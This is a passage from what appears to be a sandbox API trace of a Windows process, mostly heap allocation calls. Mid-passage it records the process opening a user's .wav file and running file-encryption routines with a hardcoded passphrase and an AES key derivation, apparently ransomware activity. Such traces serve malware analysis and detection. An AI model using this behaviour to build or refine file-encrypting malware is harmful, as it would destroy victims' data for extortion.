returned 0x43ca4a8 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0117.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0117.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0117.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0117.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0117.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0117.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0117.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0117.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0117.763] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0117.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0117.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0117.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0117.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0117.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0117.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0117.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0117.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0117.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca700, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0117.766] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\TFaPhwZGXS0zM.wav" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b\\tfaphwzgxs0zm.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0117.766] FreeLibrary (hLibModule=0x772d0000) returned 1 [0117.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca460, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0117.766] CloseHandle (hObject=0x258) returned 1 [0117.766] FreeLibrary (hLibModule=0x772d0000) returned 1 [0117.766] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0117.766] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\TFaPhwZGXS0zM.wav", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e1cd10, ftCreationTime.dwHighDateTime=0x1d5ea0e, ftLastAccessTime.dwLowDateTime=0x70eb26c0, ftLastAccessTime.dwHighDateTime=0x1d5e7df, ftLastWriteTime.dwLowDateTime=0x70eb26c0, ftLastWriteTime.dwHighDateTime=0x1d5e7df, nFileSizeHigh=0x0, nFileSizeLow=0x43ef, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="TFaPhwZGXS0zM.wav", cAlternateFileName="TFAPHW~1.WAV")) returned 0x41ac2c0 [0117.766] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0117.767] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.767] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0117.767] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0117.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0117.767] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0117.768] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0117.768] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.768] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0117.768] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.768] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.768] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.768] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.768] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.768] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca808, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0117.768] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0117.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.768] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0117.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.769] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0117.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caa30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0117.809] CryptHashData (hHash=0x41ac540, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0117.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.809] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.809] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0117.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca8f8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0117.809] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac640) returned 1 [0117.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0117.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e18 [0117.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0117.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0117.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0117.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0117.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0117.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0117.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: 